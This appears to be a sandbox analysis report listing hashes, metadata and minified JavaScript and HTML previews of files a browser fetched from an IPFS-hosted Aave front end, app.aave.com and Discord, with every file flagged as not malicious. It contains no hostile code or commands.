                                                                                                                                                                                                                                                  MD5:5FEE7C9239EEF37B3DBDBEADD751D266
                                                                                                                                                                                                                                                  SHA1:8C51FFCE34FA17F1D498071D8C0CB8C046F5C5C0
                                                                                                                                                                                                                                                  SHA-256:5C416D84CBE45508A8C837E1BB79150F122FCF5211A090D3EC7564D842B4D895
                                                                                                                                                                                                                                                  SHA-512:F393FB9E576DDD650B9F4E4BADAD100987081F81CB31C5248BECFCF0EAF4701F32029172ED050DC01104D7B28CE623689E086270D0185F87DFA01E6749C51C7C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3652],{87054:function(e,t,r){r.d(t,{Z:function(){return y}});var o=r(63366),a=r(87462),i=r(67294),n=r(86010),l=r(94780),s=r(41796),d=r(83187),c=r(36622),u=r(78884),p=r(81719),f=r(34867);function g(e){return(0,f.Z)("MuiToggleButton",e)}var h=(0,r(1588).Z)("MuiToggleButton",["root","disabled","selected","standard","primary","secondary","sizeSmall","sizeMedium","sizeLarge"]),v=r(85893);const b=["children","className","color","disabled","disableFocusRipple","fullWidth","onChange","onClick","selected","size","value"],m=(0,p.ZP)(d.Z,{name:"MuiToggleButton",slot:"Root",overridesResolver:(e,t)=>{const{ownerState:r}=e;return[t.root,t[`size${(0,c.Z)(r.size)}`]]}})((({theme:e,ownerState:t})=>{let r,o="standard"===t.color?e.palette.text.primary:e.palette[t.color].main;return e.vars&&(o="standard"===t.color?e.vars.palette.text.primary:e.vars.palette[t.color].main,r="standard"===t.color?e.vars.palette.text.primaryChannel:e.vars.pa
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):108771
                                                                                                                                                                                                                                                  Entropy (8bit):5.456108298118131
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:AvttUyAUaYOiBOa6FX7ypsI1uEY4beDZ+x:fgl1umbeDZI
                                                                                                                                                                                                                                                  MD5:E10ED53584C556D5C73F04186BC13EFB
                                                                                                                                                                                                                                                  SHA1:88AC82DA5AF4B2759FDDE946A04E71DB569D07B2
                                                                                                                                                                                                                                                  SHA-256:327121E38649354C64B29A32281150A3357F30DCF3F174048E8EFC16432E99A5
                                                                                                                                                                                                                                                  SHA-512:B219BE636BE5F6ED7CCFAB40BEB54D537DE3D1775A9FABE97E674877C4A7A14337CEF802B65D0BF8A3F43B8B2B9E01860DB44580B4A437AA7F9028AAD20B7A71
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5405],{60478:function(e,t,r){"use strict";r.r(t),r.d(t,{default:function(){return en}});var n=r(49501),o=r(30120),i=r(29630),s=r(67294),a=r(34637),l=r(59379),c=r(46930),d=r(78371),u=r(45745),p=r(15446),b=r(59631),x=r(77537),h=r(75331),m=r(62097),y=r(61225),v=r(75084),j=r(11163),f=r(68861),w=r(57609),g=r(59499),C=r(80854),O=r(1279),k=r(82403),P=r(14379),D=r(45884),Z=r(99435),S=r(1475),A=r(69331),B=r(14795),T=r(43629),I=r(41551),E=r(69125),M=r(81902),R=r(25049),N=r(45556),U=r(46839),Y=130,F=160,L=130,V=function(e,t,r,n,o){return e?W(t,r,n,o||!1):_(t,r,n,o||!1)},W=function(e,t,r,n){return"symbol"===e?z(!0,t,r):"usageAsCollateralEnabledOnUser"===e||"debt"===e?r.sort((function(t,r){return Number(t[e])-Number(r[e])})):(n&&r.sort((function(e,t){return"Variable"===e.borrowRateMode?Number(t.reserve.variableBorrowAPY)-Number(e.reserve.variableBorrowAPY):Number(t.reserve.stableBorrowAPY)-Number(e.reserve.stableBorrowAPY)})),r.sort((function
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (65531), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):100302
                                                                                                                                                                                                                                                  Entropy (8bit):5.336560783680228
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:h5MywfFn9AsoL5a44Nx6K2eSLclz5PgOYWcq6BymAxml:oywfFn9AdoVx6K2eCEPrml
                                                                                                                                                                                                                                                  MD5:0135829ED383D337047821B86C1D4C45
                                                                                                                                                                                                                                                  SHA1:0328A96CB89B132E30B723D9B682CDD866B3E9BA
                                                                                                                                                                                                                                                  SHA-256:9F759A1E9E4EB894163A6F20624E386F5D34ADCD967E1B6D78F405292B97831D
                                                                                                                                                                                                                                                  SHA-512:5E8A1D2FF7FD9D6C7E11E40CDCBD24BC7247C5331EFA5B1929A295B64FC4AD54F3D39F6ADD5D84893626014D171F24C9ABC190114344119E6E019F16B35BC82C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="initial-scale=1, width=device-width"/><title>Aave - Open Source Liquidity Protocol</title><meta name="description" content="Aave is an Open Source Protocol to create Non-Custodial Liquidity Markets to earn interest on supplying and borrowing assets with a variable or stable interest rate. The protocol is designed for easy integration into your products and services."/><meta property="og:title" content="Aave - Open Source Liquidity Protocol"/><meta property="og:description" content="Aave is an Open Source Protocol to create Non-Custodial Liquidity Markets to earn interest on supplying and borrowing assets with a variable or stable interest rate. The protocol is designed for easy integration into your products and services."/><meta property="og:image" content="https://app.aave.com/aaveMetaLogo-min.jpg"/><meta name="twitter:image" content="https://app.aave.com/aaveMetaLogo-min.jpg"/><meta name="twit
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (57581), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):57581
                                                                                                                                                                                                                                                  Entropy (8bit):5.523920669998129
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:EB0a6rMdLk3UVrj8D2Rx4Xi5EbcgLA78VecZUy2CIOzPt+UfYpc6Bp6:gmgdLkEV/Ci5EIg9eDy2Cjz3+6
                                                                                                                                                                                                                                                  MD5:1CAB257613BC5411E41F4FC15DAB2BA3
                                                                                                                                                                                                                                                  SHA1:D35BD54DB683BC5C8C9F1E1AFFB9884EE34ACD1F
                                                                                                                                                                                                                                                  SHA-256:2D5EEAB1079F32931000655533AEE2BC2DE3997C9E32AC66BBC60D4A1DE46340
                                                                                                                                                                                                                                                  SHA-512:9EA16E7D75E015E38D9A7420B538D5963982178642ABEA7E63E5AE0F3286D2EAB19BB25508AF73D06C5AE706DDB06B3519C05638F556FB499EACA13376BA4132
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8219,6504],{96471:function(e,n,t){"use strict";var r=t(64836);n.Z=void 0;var o=r(t(64938)),i=t(85893),s=(0,o.default)((0,i.jsx)("path",{d:"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z"}),"ArrowBackOutlined");n.Z=s},89722:function(e,n,t){"use strict";t.d(n,{Z:function(){return b}});var r=t(87462),o=t(63366),i=t(67294),s=t(86010),a=t(94780),l=t(81719),c=t(78884),d=t(36622),u=t(34867);function x(e){return(0,u.Z)("MuiIcon",e)}(0,t(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var m=t(85893);const h=["baseClassName","className","color","component","fontSize"],p=(0,l.ZP)("span",{name:"MuiIcon",slot:"Root",overridesResolver:(e,n)=>{const{ownerState:t}=e;return[n.root,"inherit"!==t.color&&n[`color${(0,d.Z)(t.color)}`],n[`fontSize${(0,d.Z)(t.fontSize)}`]]}})((({theme:e,ownerState:n})=>({userSelect:"n
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (13036), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):13036
                                                                                                                                                                                                                                                  Entropy (8bit):5.471579637442991
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:dFIHqT0a1tfd9zBBqgO9cbCNdV8DjIWUlczhbCu:dDTv1P9zigOeov8RbCu
                                                                                                                                                                                                                                                  MD5:537C1A15CF24097C4DC8F54C8F467F1B
                                                                                                                                                                                                                                                  SHA1:0A00875515D03B65DCA77210EB0EF822A6133684
                                                                                                                                                                                                                                                  SHA-256:6C386CC711BA1B3FE2360F6E6475A7CECD2AE5D8C1C45FC617582D6046193691
                                                                                                                                                                                                                                                  SHA-512:3990E739DF5D509194AD4D04C410395668A324FCF9EDEEDED547F780B718FDCD231A255B38F77DE7B1DFD90449F76ABE58342EFD90B84A49BF8D10ED8ED6F159
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/4284-bbf96c7bcf282a59.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4284],{50020:function(e,n,r){var t=r(59499),o=r(4730),i=r(91655),a=r(30120),s=r(29630),c=(r(67294),r(73965)),l=r(41024),d=r(85893),p=["minVal","maxVal","percentVariant","hyphenVariant"];function u(e,n){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var t=Object.getOwnPropertySymbols(e);n&&(t=t.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),r.push.apply(r,t)}return r}function x(e){for(var n=1;n<arguments.length;n++){var r=null!=arguments[n]?arguments[n]:{};n%2?u(Object(r),!0).forEach((function(n){(0,t.Z)(e,n,r[n])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):u(Object(r)).forEach((function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}))}return e}n.Z=function(e){var n=e.minVal,r=e.maxVal,t=e.percentVariant,u=e.hyphenVariant,h=(0,o.Z)(e,p),f=(0,c.HT)(),m=f.ghoLoadingData,j=f.ghoReserveData;if(m)return(0,d.js
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (7563), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):7563
                                                                                                                                                                                                                                                  Entropy (8bit):5.333364781559997
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:MAwDrZCCqfi6eD8Fz2EsxR5lX1f+1CLmH7x5NOoYpmso:M/ACq3ecu3fYCKbsoamX
                                                                                                                                                                                                                                                  MD5:F460CEB778DC53433F6B7A7180E4E079
                                                                                                                                                                                                                                                  SHA1:217FABAA6AE79BA83E3ED5ED6E346D9CA8DC7A92
                                                                                                                                                                                                                                                  SHA-256:11DEB44D4C369B95C0EC4AF748694662F47410B01368FD4550B2CD2D62A9717B
                                                                                                                                                                                                                                                  SHA-512:6673A33E57B3A39CE1F209A461C8F3A3CB662C45914939B95876B09120D80284F03DB1C9E02479B35A5891238CAB0E3118025FCFDBD7A03360B9CB3BB524A44B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/1000-d55cf0a9cf45dbc9.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1e3],{64288:function(e,t,n){n.d(t,{Z:function(){return w}});var r=n(63366),o=n(87462),i=n(67294),s=n(86010),a=n(28320),l=n(34867),u=n(94780),c=n(29628),d=n(13264),p=n(66500),m=n(85893);const h=["className","component","disableGutters","fixed","maxWidth","classes"],f=(0,p.Z)(),b=(0,d.Z)("div",{name:"MuiContainer",slot:"Root",overridesResolver:(e,t)=>{const{ownerState:n}=e;return[t.root,t[`maxWidth${(0,a.Z)(String(n.maxWidth))}`],n.fixed&&t.fixed,n.disableGutters&&t.disableGutters]}}),v=e=>(0,c.Z)({props:e,name:"MuiContainer",defaultTheme:f});var x=n(36622),g=n(81719),S=n(78884);const y=function(e={}){const{createStyledComponent:t=b,useThemeProps:n=v,componentName:c="MuiContainer"}=e,d=t((({theme:e,ownerState:t})=>(0,o.Z)({width:"100%",marginLeft:"auto",boxSizing:"border-box",marginRight:"auto",display:"block"},!t.disableGutters&&{paddingLeft:e.spacing(2),paddingRight:e.spacing(2),[e.breakpoints.up("sm")]:{paddingLeft:
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (11498)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):11547
                                                                                                                                                                                                                                                  Entropy (8bit):5.655703496467401
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:832FaInJkXD9sQex3Wlp4JG+xyhyTBwFRAD0CoeN1ZL:832UK2XD9sQex3Wj4JG+xS0ylaL
                                                                                                                                                                                                                                                  MD5:C30BEFB4CCFDB0BE1B3D9BEEECD571E9
                                                                                                                                                                                                                                                  SHA1:363088B83B9593F876124847B5AA2B1947A94BDE
                                                                                                                                                                                                                                                  SHA-256:71B7BC585DD170091EF8C6619E68F2CCBF740F252ECF5B9BB46353066E4D6E72
                                                                                                                                                                                                                                                  SHA-512:E1B791A35F189086E1C1BB658A5A0BF2E30992F6D84BA573E5EDA7860E46C939DD4844830A704D88597E4A768132C71BF6D6C0E6C75000CFF88A13554F1F4A8A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/b595a2694f43514497d1.js
                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["90628"],{231443:function(e){e.exports="/assets/e04bcb7316f7205e85fb.svg"},74830:function(e){e.exports="/assets/23a7a3fd6624342117bf.svg"},206818:function(e){e.exports="/assets/17a91e9b4e7eb3921ed5.svg"},73117:function(e,s,n){e.exports=n.p+"39b91170d9f2309e4c5e.mov"},988868:function(e,s,n){e.exports=n.p+"15aad6b83736f221e23b.mp4"},554355:function(e){e.exports="/assets/fb70c6325a7d728cb6d0.png"},991989:function(e,s,n){e.exports=n.p+"48ad19e80083bee682d2.webm"},787462:function(e,s,n){e.exports=n.p+"a476863d4f441618840f.mov"},635507:function(e,s,n){e.exports=n.p+"87c3abd90e246db4b38a.mp4"},470794:function(e){e.exports="/assets/7df11a68a272724be266.png"},886777:function(e,s,n){e.exports=n.p+"b235c36699192662a3fe.webm"},588705:function(e,s,n){n.d(s,{R:function(){return f}}),n(411104);var t=n(735250),a=n(470079),l=n(442837),r=n(481060),i=n(388905),u=n(686546),o=n(925329),c=n(372769),m=n(726745),d=n(973616),I=
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (18695), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):18695
                                                                                                                                                                                                                                                  Entropy (8bit):5.302518817662126
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:mzWvsZkx5Q5eR3AN14v0evZk9NMj1zQZuZrBXetbi2UMMxqJEYMVlqJzsCweVaV5:mzWvs+amu14v0evKSNQ3bioMxcMvusl
                                                                                                                                                                                                                                                  MD5:6F5120901E484CA4E1458367C70834AB
                                                                                                                                                                                                                                                  SHA1:B61E6C9A758F0CB72B3EBFB248652E797C67754F
                                                                                                                                                                                                                                                  SHA-256:EE8C161C52EA10BE82EBAE25D55ACD9F768798866F659BEA2A17F7971FC4FB06
                                                                                                                                                                                                                                                  SHA-512:4BE3F1F3E0B84F884C41091F27CA5C4904403B51D8FB59882EF9449ACB723BDB8DA98479E23AEC37652D0624655582701D980F154AADB1F16C8A8A407E2F2EC7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/5559-6c8d46c115744018.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5559],{15446:function(e,n,t){"use strict";t.d(n,{O:function(){return i}});var r=t(30120),o=t(64288),a=t(85893),i=function(e){var n=e.children;return(0,a.jsx)(r.Z,{sx:{display:"flex",flexDirection:"column",flex:1,mt:{xs:"-32px",lg:"-46px",xl:"-44px",xxl:"-48px"}},children:(0,a.jsx)(o.Z,{children:n})})}},3765:function(e,n,t){"use strict";t.d(n,{p:function(){return l}});var r=t(49501),o=t(75084),a=t(5152),i=t(26074),c=t(78371),s=t(57609),u=t(85893),p=(0,a.default)((function(){return Promise.resolve().then(t.bind(t,58294)).then((function(e){return e.WalletModal}))}),{loadableGenerated:{webpack:function(){return[58294]}}}),l=function(e){var n=e.funnel,t=(0,i.q)().setWalletModalOpen,a=(0,c.Y)((function(e){return e.trackEvent}));return(0,u.jsxs)(u.Fragment,{children:[(0,u.jsx)(o.Z,{variant:"gradient",onClick:function(){a(s.Bp.CONNECT_WALLET,{funnel:n}),t(!0)},children:(0,u.jsx)(r.cC,{id:"Connect wallet"})}),(0,u.jsx)(p,{})]})}},41024:fu
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (9319)
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):9368
                                                                                                                                                                                                                                                  Entropy (8bit):5.517406162410664
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:i5FOdCCCb5Ui4C5wOjggHurX0W89VSIFIUpSpWgAUcnNyeVjAZ2dQTK0ne+6ACuR:iSbuIAr3gKYa48OwaU7PQDFRtQq
                                                                                                                                                                                                                                                  MD5:CBFFDA44430EA3BA1E3B5C0E015FC252
                                                                                                                                                                                                                                                  SHA1:1772AC715EC2F25ECEF0CC4A86A5C3737D2D972B
                                                                                                                                                                                                                                                  SHA-256:E9AE87D055719672140711F121B4B13AF030681D9512FC358226006DB77226F9
                                                                                                                                                                                                                                                  SHA-512:0A3B42AB87CB4748288940E5F85FDC277EEF071BA3494A4849916333FE22468DB8515BFE976C100471400315843BA1EA337AB20FBA49ADAB773E6ED21EF09124
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["84956"],{986197:function(e,t,n){var i=n(990547),o=n(544891),a=n(570140),s=n(881052),r=n(626135),u=n(573261),l=n(545851),g=n(109488),d=n(794099),c=n(981631),m=n(689938);n(135200);t.Z={resetSuggestions:()=>a.Z.dispatch({type:"POMELO_SUGGESTIONS_RESET"}),async fetchSuggestionsRegistration(e){let t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:1500;if(!!(0,d.vc)()){a.Z.dispatch({type:"POMELO_SUGGESTIONS_RESET"});try{var n;let i=await o.tn.get({url:c.ANM.POMELO_SUGGESTIONS_UNAUTHED,query:null==e?void 0:{global_name:e},timeout:t});if(i.ok&&(null===(n=i.body)||void 0===n?void 0:n.username)!=null)return a.Z.dispatch({type:"POMELO_REGISTRATION_SUGGESTIONS_SUCCESS",suggestion:i.body,source:e})}catch(e){return}}},async fetchSuggestions(e){if(!!(0,g.P)())try{var t;a.Z.dispatch({type:"POMELO_SUGGESTIONS_FETCH",usernameSuggestionLoading:!0});let n=await o.tn.get({url:c.ANM.POMELO_SUGGESTIONS,timeout:e});if(
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):71691
                                                                                                                                                                                                                                                  Entropy (8bit):5.290566318478528
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:O2uB0DdnFpVMQfuhkGT0iCfWXRFGY+9Ti:OAVm6GT0BuhFSTi
                                                                                                                                                                                                                                                  MD5:9612DEE64A8F3AD04BC68825DE164872
                                                                                                                                                                                                                                                  SHA1:A209961210B29D86F200EB7F70550EF2BFF17EF5
                                                                                                                                                                                                                                                  SHA-256:B18A7EC622A23BDDD75CA937CDD0DFA384F3AA1C5D276CBFAB59776F77CAAA1B
                                                                                                                                                                                                                                                  SHA-512:7D097E25A903F850A5A627842C377ECE5B270D9AF40237A6AECFD9E232BB9856BF6AE5AEF62236790BEBC2576E1F53245DFD66AD6DE08E3E05DD5D7BA6BB97BE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/29107295.4a69275373f23f88.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3662],{96486:function(n,t,r){var e;n=r.nmd(n),function(){var u,i="Expected a function",o="__lodash_hash_undefined__",f="__lodash_placeholder__",a=16,c=32,l=64,s=128,h=256,p=1/0,v=9007199254740991,_=NaN,g=4294967295,y=[["ary",s],["bind",1],["bindKey",2],["curry",8],["curryRight",a],["flip",512],["partial",c],["partialRight",l],["rearg",h]],d="[object Arguments]",b="[object Array]",w="[object Boolean]",m="[object Date]",x="[object Error]",j="[object Function]",A="[object GeneratorFunction]",k="[object Map]",O="[object Number]",I="[object Object]",E="[object Promise]",R="[object RegExp]",z="[object Set]",S="[object String]",C="[object Symbol]",W="[object WeakMap]",L="[object ArrayBuffer]",U="[object DataView]",B="[object Float32Array]",T="[object Float64Array]",$="[object Int8Array]",D="[object Int16Array]",N="[object Int32Array]",M="[object Uint8Array]",F="[object Uint8ClampedArray]",P="[object Uint16Array]",q="[object Uint32Array]
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (1232)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):10453
                                                                                                                                                                                                                                                  Entropy (8bit):5.368590116387789
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:fqQQDuqjqgqERr8PqeoVNhHq+q/qHnx/0:9QDuK1NRuRoVNZ/AGnx/0
                                                                                                                                                                                                                                                  MD5:B6753EBEC28F3AF40C67BD119BB86471
                                                                                                                                                                                                                                                  SHA1:14DB86689E2276A9FB13703DC874B88E33736D8C
                                                                                                                                                                                                                                                  SHA-256:0BAB774EEF1B7831CB205DEA315652B4FF1D08DF6E341ECADF325785DD0787DD
                                                                                                                                                                                                                                                  SHA-512:863982B59CA9DE900C3B3F4BA90E91CD30593AD0954D5EDBACAE238439F95A92A1406C7E9368EAA2A323150486B255BB7B46D149B86C21BB99016CC715955E28
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/invite/aave
                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html>.<head> <meta charset="utf-8">. <meta content="width=device-width,initial-scale=1,maximum-scale=3" name="viewport">.<meta name="description" content="The Aave Protocol is an open source, decentralized, non-custodial liquidity protocol. | 23805 members" />.<meta name="twitter:card" content="summary_large_image" />.<meta name="twitter:site" content="@discord" />.<meta name="twitter:title" content="Join the Aave Community Discord Server!" />.<meta name="twitter:description" content="The Aave Protocol is an open source, decentralized, non-custodial liquidity protocol. | 23805 members" />.<meta property="og:title" content="Join the Aave Community Discord Server!" />.<meta property="og:url" content="https://discord.com/invite/aave" />.<meta property="og:description" content="The Aave Protocol is an open source, decentralized, non-custodial liquidity protocol. | 23805 members" />.<meta property="og:site_name" content="Discord" />.<link rel="canonical" href="https:/
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):1911385
                                                                                                                                                                                                                                                  Entropy (8bit):5.557673347281288
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:fpyXnndDIMWe/EWGYUIS6gieDaGJEuI6tw3INniY9qom+T3UU/80IH9X:WhE6
                                                                                                                                                                                                                                                  MD5:13561A4654CC8B06683612DC0FF1540B
                                                                                                                                                                                                                                                  SHA1:30BBD47E5FC84B8635E08437E70B6D27E68E6C7E
                                                                                                                                                                                                                                                  SHA-256:33146D959F04782E645DB81EC629732A5AB1AACC5D26D2AA721B9119411BD742
                                                                                                                                                                                                                                                  SHA-512:A6F347E5A3C282281CC781A1E47405553915015711EEDD91944DD3C7434560C764BE520D171AB7E73D27FD2E23DC364EBB9871025EB1DCDE9E4FCDA357560609
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/pages/_app-59c4c0609aba862f.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2888],{20846:function(e,t,n){"use strict";n.d(t,{W:function(){return s}});var r=n(64146),a=n(8198);const i=[{inputs:[{internalType:"address",name:"stkAave",type:"address"},{internalType:"address",name:"ethUsdPriceFeed",type:"address"},{internalType:"address",name:"aaveUsdPriceFeed",type:"address"}],stateMutability:"nonpayable",type:"constructor"},{inputs:[],name:"AAVE_USD_PRICE_FEED",outputs:[{internalType:"address",name:"",type:"address"}],stateMutability:"view",type:"function"},{inputs:[],name:"ETH_USD_PRICE_FEED",outputs:[{internalType:"address",name:"",type:"address"}],stateMutability:"view",type:"function"},{inputs:[],name:"STAKED_AAVE",outputs:[{internalType:"address",name:"",type:"address"}],stateMutability:"view",type:"function"},{inputs:[{internalType:"address",name:"stakedAsset",type:"address"},{internalType:"address",name:"oracle",type:"address"}],name:"getStakedAssetData",outputs:[{components:[{internalType:"uint256",
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (33464), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):33464
                                                                                                                                                                                                                                                  Entropy (8bit):5.4575880021259335
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:JUNUG7Go3tJaYfTXQIxk+cLNEx94OX5mDCIOzSJ:9CTxLIagCjzO
                                                                                                                                                                                                                                                  MD5:D6C203D7E71602AAD4B90ED2CB6F39D1
                                                                                                                                                                                                                                                  SHA1:D4810054C90A1DA96E0B496E56103C78D10605A4
                                                                                                                                                                                                                                                  SHA-256:68D1958C871E142666C370701BFA921806A5E765335C0DAEA2EDB95091F5C800
                                                                                                                                                                                                                                                  SHA-512:B244DA156D3FB289FC82D009B2BAB74A00D81E33792EB4189F8D927D0750C1FF1B06151895B55F78DC93F50AC1EFB869CA6FEBE6DF99445002201838DB5A4784
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/pages/governance-a17757b11c661747.js
